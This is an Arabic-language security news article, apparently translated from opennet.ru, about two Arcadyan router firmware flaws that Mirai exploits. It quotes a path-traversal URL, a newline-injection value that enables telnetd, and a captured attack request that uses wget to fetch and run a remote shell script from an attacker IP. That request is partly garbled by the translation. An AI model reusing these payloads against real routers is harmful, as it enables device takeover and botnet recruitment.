ثغرة أمنية في أجهزة التوجيه المنزلية تؤثر على 17 شركة مصنعة

تم تسجيل هجوم هائل على الشبكة ضد أجهزة التوجيه المنزلية التي تستخدم برامجها الثابتة تطبيق خادم HTTP من شركة Arcadyan. للتحكم في الأجهزة، يتم استخدام مزيج من اثنتين من نقاط الضعف التي تسمح بالتنفيذ عن بعد لتعليمات برمجية عشوائية مع حقوق الجذر. تؤثر المشكلة على مجموعة واسعة إلى حد ما من أجهزة توجيه ADSL من Arcadyan وASUS وBuffalo، بالإضافة إلى الأجهزة المتوفرة تحت العلامات التجارية Beeline (تم تأكيد المشكلة في Smart Box Flash) وDeutsche Telekom وOrange وO2 وTelus وVerizon وVodafone و مشغلي الاتصالات الأخرى. تجدر الإشارة إلى أن المشكلة كانت موجودة في البرامج الثابتة Arcadyan منذ أكثر من 10 سنوات وتمكنت خلال هذا الوقت من الانتقال إلى ما لا يقل عن 20 طرازًا من الأجهزة من 17 شركة مصنعة مختلفة.

الثغرة الأمنية الأولى، CVE-2021-20090، تجعل من الممكن الوصول إلى أي برنامج نصي لواجهة الويب دون مصادقة. يكمن جوهر الثغرة الأمنية في أنه في واجهة الويب، يمكن الوصول إلى بعض الأدلة التي يتم من خلالها إرسال الصور وملفات CSS ونصوص JavaScript دون مصادقة. في هذه الحالة، يتم التحقق من الدلائل التي يُسمح بالوصول إليها دون مصادقة باستخدام القناع الأولي. يتم حظر تحديد الأحرف "../" في المسارات للانتقال إلى الدليل الأصلي بواسطة البرنامج الثابت، ولكن يتم تخطي استخدام المجموعة "..%2f". وبالتالي، من الممكن فتح الصفحات المحمية عند إرسال طلبات مثل “http://192.168.1.1/images/..%2findex.htm”.

الثغرة الثانية، CVE-2021-20091، تسمح للمستخدم المعتمد بإجراء تغييرات على إعدادات نظام الجهاز عن طريق إرسال معلمات منسقة خصيصًا إلى البرنامج النصي application_abstract.cgi، والذي لا يتحقق من وجود حرف السطر الجديد في المعلمات . على سبيل المثال، عند إجراء عملية ping، يمكن للمهاجم تحديد القيمة "192.168.1.2%0AARC_SYS_TelnetdEnable=1" في الحقل مع التحقق من عنوان IP والبرنامج النصي، عند إنشاء ملف الإعدادات /tmp/etc/config/ .glbcfg، سيكتب السطر "AARC_SYS_TelnetdEnable=1" فيه "، والذي يقوم بتنشيط خادم telnetd، الذي يوفر وصولاً غير مقيد إلى غلاف الأوامر مع حقوق الجذر. وبالمثل، من خلال تعيين المعلمة AARC_SYS، يمكنك تنفيذ أي تعليمات برمجية على النظام. تتيح الثغرة الأمنية الأولى إمكانية تشغيل برنامج نصي به مشكلات دون المصادقة عليه من خلال الوصول إليه باسم "/images/..%2fapply_abstract.cgi".

لاستغلال الثغرات الأمنية، يجب أن يكون المهاجم قادرًا على إرسال طلب إلى منفذ الشبكة الذي تعمل عليه واجهة الويب. انطلاقًا من ديناميكيات انتشار الهجوم، يترك العديد من المشغلين إمكانية الوصول إلى أجهزتهم من الشبكة الخارجية لتبسيط تشخيص المشكلات بواسطة خدمة الدعم. إذا كان الوصول إلى الواجهة يقتصر على الشبكة الداخلية فقط، فيمكن تنفيذ الهجوم من شبكة خارجية باستخدام تقنية "إعادة ربط DNS". يتم بالفعل استخدام الثغرات الأمنية بشكل نشط لتوصيل أجهزة التوجيه بشبكة Mirai botnet: POST /images/..%2fapply_abstract.cgi HTTP/1.1 الاتصال: إغلاق وكيل المستخدم: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_ping_ipaddress=212.192.241.7. 0%1A ARC_SYS_TelnetdEnable=0& %212.192.241.72AARC_SYS_=cd+/tmp; wget+http://212.192.241.72/lolol.sh; الضفيرة+-O+http://777/lolol.sh; chmod+0+lolol.sh; sh+lolol.sh&ARC_ping_status=4&TMP_Ping_Type=XNUMX

المصدر: opennet.ru

إضافة تعليق